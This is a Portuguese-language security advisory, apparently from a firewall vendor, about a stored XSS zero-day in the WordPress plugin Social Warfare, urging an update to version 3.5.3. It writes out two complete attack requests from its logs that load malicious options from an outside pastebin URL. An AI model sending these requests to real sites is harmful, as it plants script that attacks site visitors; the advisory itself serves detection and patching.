Uma vulnerabilidade de dia zero acaba de aparecer no mundo dos plugins do WordPress, afetando mais de 70.000 sites usando o plugin Social Warfare.

O plugin é vulnerável a uma falha de XSS (Cross-Site Scripting) armazenado e foi removido do repositório de plugins. Os ataques podem ser realizados por qualquer usuário que visite o site.

Um patch foi lançado e os usuários são aconselhados a atualizar para a versão 3.5.3 o mais rápido possível.

Eventos detectados por nossa tecnologia

Analisando os logs de eventos detectados por nosso Web Application Firewall (WAF), identificamos que o 0day explora a falha através de solicitações direcionadas para qualquer arquivo PHP em /wp-admin/ com os seguintes parâmetros em seus logs de acesso:

• swp_debug
• swp_url

Nos Logs identificados, foram bloqueadas solicitações POST de XSS Stored padrões direciondas a /wp-admin/admin-ajax.php e /wp-admin/admin-post.php, com os seguintes parâmetros e valores:

POST /wp-admin/admin-ajax.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/HRsL6Drh

POST /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/HRsL6Drh 

As evidências de tentativa de exploração do 0day de XSS Stored podem ser vistas a seguir:

Solicitações POST de XSS Stored
direcionadas a /wp-admin/admin-ajax.php

Solicitações POST de XSS Stored direcionadas a /wp-admin/admin-post.php